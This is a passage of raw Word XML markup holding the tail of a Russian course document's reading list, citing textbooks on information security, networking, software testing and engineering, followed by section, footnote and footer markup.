        </w:rPr>
        <w:t>Управление информационными рисками: Учеб. пособие. – М.: РУДН, 2008. – 158 с.: ил.</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 xml:space="preserve">Каторин Ю.Ф., Разумовский А.В., Спивак А.И. Защита информации техническими средствами: Учебное пособие </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Под ред. Ю.Ф. Каторина. – СПб: НИУ ИТМО, 2012. – 416 с.</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bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Киселев С.В., Киселев И.Л. Основы сетевых технологий: учеб. пособие для студ. учреждений нач. проф. образования – 2-е изд. стер. – М.: Издательский центр </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Академия</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2012. –  64с</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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кулямин</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В.В. Методы верификации программного обеспечения. – М.: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Институт системного программирования РАН, 2009. – 117 с.</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 xml:space="preserve">Лапонина О.Р. Основы сетевой безопасности. Ч. 1. Межсетевые экраны: Учебное пособие. – М.: Национальный Открытый Университет </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ИНТУИТ</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 xml:space="preserve"> , 2014. – 378 с.</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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Липаев В.В. Сертификация программных средств. Учебник. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– М.: СИНТЕГ, 2010. – 348с.</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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Липаев В.В. Тестирование компонентов и комплексов программ. Учебник. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– М.: СИНТЕГ, 2010. – 400 с.</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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мазаник С.В. Безопасность компьютера: защита от сбоев, вирусов и неисправностей. –М.: Эксмо, 2014. – 256 с.</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eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Партыка Т.JL, Попов И.И. Информационная безопасность: учебное пособие / Т.JI. Партыка, И.И. Попов. – 3-е изд., перераб. и доп. – М.: ФОРУМ, 2010. – 432 с.</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 xml:space="preserve">Процессы анализа и управления рисками в области ИТ. / И.А.  Никитин, М.Т. Цулая: Электронная книга. Доступ: свободно. Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId509" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.intuit.ru/goods_store/ebooks/9830</w:t>
        </w:r>
      </w:hyperlink>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 xml:space="preserve">Рудаков А.В. Технология разработки программных продуктов: учеб. пособие для студ. учреждений сред. проф. образования / А.В. Рудаков. – 2-е изд., стер. – М.: Издательский центр </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Академия</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 xml:space="preserve">, 2013. – 208 с. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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 xml:space="preserve">Рудаков А.В. Технология разработки программных продуктов. Практикум: учеб. пособие для студ. учреждений сред. проф. образования / А.В.Рудаков, Г.Н. Федорова. – 4-е изд., стер. – М.: Издательский центр </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Академия</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 2014. – 192 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительные источники:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Анисимов В.В. Проектирование информационных систем. Электронный ресурс: https://sites.google.com/site/anisimovkhv/learning/pris.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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Арчибальд Р. Управление высокотехнологичными программами и проектами / Рассел Д. Арчибальд; ред. А.Д. Баженов, А.О. Арефьева; пер. с. англ. Е.В. Мамонтова. – 3-е изд., перераб. и доп. – М.: ДМК Пресс; Компания АйТи, 2012. – 464 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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 xml:space="preserve">Баканов В.М. Сетевые технологии: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>учебное пособие. – M.: МГУПИ, 2008. – 105 c.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Безбогов А.А. Безопасность операционных систем: учебное пособие / А.А. Безбогов, А.В. Яковлев, Ю.Ф. Мартемьянов. – М.: Издательство </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Машиностроение-1</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2007. – 220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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Грибулин В.Г. Комплексная система защиты информации на предприятии: учеб. пособие для студ. высш. учеб. заведений / В.Г. Грибулин, В.В. Чудовский. – М.: Издательский центр </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Академия</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 xml:space="preserve">, 2009. – 416 с. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ехлаков Ю.П. Введение в программную инженерию. – Томск: Эль Контент, 2011. – 148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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Калайда В.Т., Романенко В.В. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Технология разработки программного обеспечения: Учебное пособие. – Томск: Томский межвузовский центр дистанционного образования, 2007. – 257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Коцюба И.Ю., Чунаев А.В., Шиков А.Н. Основы проектирования информационных систем. Учеб. пос. – СПб: Университет ИТМО, 2015. – 206 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Куликов С.C. Тестирование программного обеспечения. Базовый курс: практ. пособие. / С. С. Куликов. – Минск: Четыре четверти, 2015</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обслуживание отраслевых программных продуктов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. – 294 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Куликов С.С. Тестирование программного обеспечения. Базовый курс: Учебник.– Минск: Четыре четверти, 2017. – 294 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Лаврищева Е.М., Петрухин В.А. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методы и средства инженерии программного обеспечения: Учебное пособие. – М.:МФТИ, 2007. – 415 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Макаренко С.И. Информационная безопасность: учебное пособие. – Ставрополь: СФ МГГУ им. М. А. Шолохова, 2009. – 372 с.: ил.</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Машкин А.В. Технология разработки программного обеспечения: учебное пособие / А.В. Машкин. – Вологда: ВоГУ, 2014. – 75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 xml:space="preserve">Милованов И.В. Основы разработки программного обеспечения вычислительных систем: учебное пособие / И.В. Милованов, В.И. Лоскутов. – Тамбов: Изд-во ГОУ ВПО ТГТУ, 2011. – 88 с. </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Новиков В.А. Технологические подходы к разработке программного обеспечения</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 xml:space="preserve"> учебно-методическое пособие. – СПб.: Санкт-Петербургский государственный университет информационных технологий, механики и оптики, 2012. – 137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Новиков Ф.А., Иванов Д.Ю., Моделирование на UML [Электронный ресурс]: Интернет книга. Режим доступа: http:// book.uml3.ru.</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Новиков Ф.А., Иванов Д.Ю., Моделирование на UML. Теория, практика, видеокурс, – СПб.: Профессиональная литература, 2010. – 640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Олифер В., Олифер Н. Компьютерные сети. Принципы, технологии, протоколы: Учебник для вузов. 5-е изд. – СПб.: Питер, 2016. – 992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 xml:space="preserve">Проектирование информационных систем (на примере методов структурного системного анализа): учебное пособие / О.Г. Инюшкина –  Екатеринбург: </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Форт-Диалог Исеть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. – 240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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проектирование информационных систем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: учебник и практикум для академического бакалавриата / под ред. Д. В. Чистова. – М.: Издательство Юрайт, 2016. – 258 с. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Роберт Дж. Мюллер, Проектирование баз данных и UML – М.: Лори, 2013, – 432 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Руденков Н.А., Долинер Л.И. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Основы сетевых технологий: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Учебник. – Екатеринбург: РГППУ, 2011. – 377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Сбои и ошибки компьютера: простой и понятный самоучитель / В. Леонов. – М.: Эскими, 2015. – 352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Советов Б.Я., Базы данных: теория и практика: Учебник для бакалавров – 2-е изд. – М.: Юрайт, 2012. – 464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 xml:space="preserve">Соммервилл Иан. Инженерия программного обеспечения, 6-е изд.: Пер. с англ. – М.: Издательский дом </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вильямс</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2002. – 624 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Тестирование программного обеспечения. Фундаментальные концепции менеджмента бизнес-приложений: Пер. с англ./Сэм Канер, Джек Фолк, Енг Кек Нгуен. – К.: Издательство </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ДиаСофт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2001. – 544 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434232" w:rsidRPr="00617AC0" w:rsidRDefault="00434232" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Токмаков Г.П. Автоматизированное проектирование информационных систем: Учебное пособие / Г.П. Токмаков. – Ульяновск: УлГТУ, 2015. − 121 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00607C3B" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DB3FFC" w:rsidRPr="00607C3B" w:rsidSect="00434232">
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="567" w:right="1134" w:bottom="567" w:left="1134" w:header="567" w:footer="567"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26ED" w:rsidRDefault="00E326ED" w:rsidP="00086055">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E326ED" w:rsidRDefault="00E326ED" w:rsidP="0008605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WOL_Reg">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="WOL_Bold">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000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48866"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00C23A43" w:rsidRDefault="00B56D78" w:rsidP="00AE4D37">
        <w:pPr>
          <w:pStyle w:val="ad"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="left"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="00DD50E0">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>196</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48867"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w:rsidR="00C23A43" w:rsidRDefault="00B56D78" w:rsidP="00FF1B39">
        <w:pPr>
          <w:pStyle w:val="ad"/>
          <w:ind w:firstLine="0"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:fldSimple w:instr=" PAGE   \* MERGEFORMAT ">
          <w:r w:rsidR="00DD50E0">
            <w:rPr>
              <w:noProof/>
